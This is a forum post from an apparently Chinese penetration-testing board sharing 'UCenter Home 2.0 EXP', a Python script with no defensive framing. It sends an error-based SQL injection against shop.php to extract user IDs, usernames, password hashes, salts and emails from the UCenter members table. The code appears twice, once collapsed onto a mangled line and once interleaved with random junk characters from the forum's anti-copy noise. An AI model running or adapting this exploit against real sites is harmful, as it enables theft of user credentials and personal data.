找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2342|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
5 t7 r9 ~* G9 f) H
! m' U9 I' ?' r: A. U7 @0 ^9 U1 Q% P: s5 H3 A; v- k, Q7 n8 s6 S
#!/usr/bin/env python  
* j1 m( d+ G# O3 G8 t
/ d) E; h% ]4 `8 |import sys  
9 |0 v* y% Z. w" mimport urllib2  4 W/ U* [* [1 }' v% S1 X
import re  & u# _. r1 _% M1 r: l
% |( o! v5 x' [# K- {! e3 t  r
def info():  ! h( D- ]  S- i3 f( ?* H( z* Z4 j' Z% [
    print 'From:http://www.exploit-db.com/exploits/14997/'
! I8 D# }4 m, x5 w' `0 h; G7 d& k, c    print 'http://www.hake.cc/Web_loudong/' 7 s3 N) D3 k0 B# y# {. m8 P
    print 'changed:qiaoy'  % W# l( b3 K, B+ y  y
    print 'exp:'  , w& P" P8 h6 E( |
    print ' ./UCenter_Home_2.0.py site'  
9 W* w9 R) U: c , V- Y5 I) \8 w8 ^1 |# L6 d# U
def main():  
& n( z5 b- Y( L! G    if len(sys.argv) != 2:  
! L6 V4 M$ G& i! P) M# {        info()  # u0 M4 K" Y5 u7 o  s
    else:  
' R. |# N( S9 z% S& j        site = sys.argv[1]  
0 \" O" ]; ?' G3 Y+ B/ f- `' s        if site[0:7] == 'http://':    `3 x( H; X4 v
            sitesite =site  : b( O* ^% p. K2 ~( P  }- _
        elif site[0:8] == 'https://':  1 c* k) ]' ~$ E8 M
            sitesite = site  
3 P2 i" U" j! ]( d' v$ N        else:    Y! j/ I+ l  g  ~
            site = 'http://'+site  
+ a; X( v" l& z% C* H0 Y3 z" R; n        try:  
+ `3 z  g! E# i% O. V! R& r! k            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
7 I# H; m0 P  e7 ?$ ?% W8 h            Value = urllib2.urlopen(url).read()  * t+ d0 V8 W" z1 v- k- \# A3 L
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  0 K- o  e$ O; Q' h+ |& k
            hacked = Msg.split(':')  
% H3 `4 A' ~# d. x6 A            print 'Name:    '+hacked[1]  . H  O- n9 ~. [& J* L/ H
            print 'Passwd:  '+hacked[2]  4 ]0 X# c$ P% ~1 p8 `( A( o0 b" }
            print 'salt:    '+hacked[3]  $ C  ?. Z# I; T
            print 'email:   '+hacked[4]  
" o3 F; b9 y, d" x5 o        except:  5 f1 B1 f2 u" y# m0 f% }
            print 'Sorry,I can\'t work............'    [5 m3 y4 @! k4 N7 _/ `; s; o2 Z
3 I. Y  g  @- H" }# T; L
if __name__ == '__main__':  
- u& b0 }" e- B    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表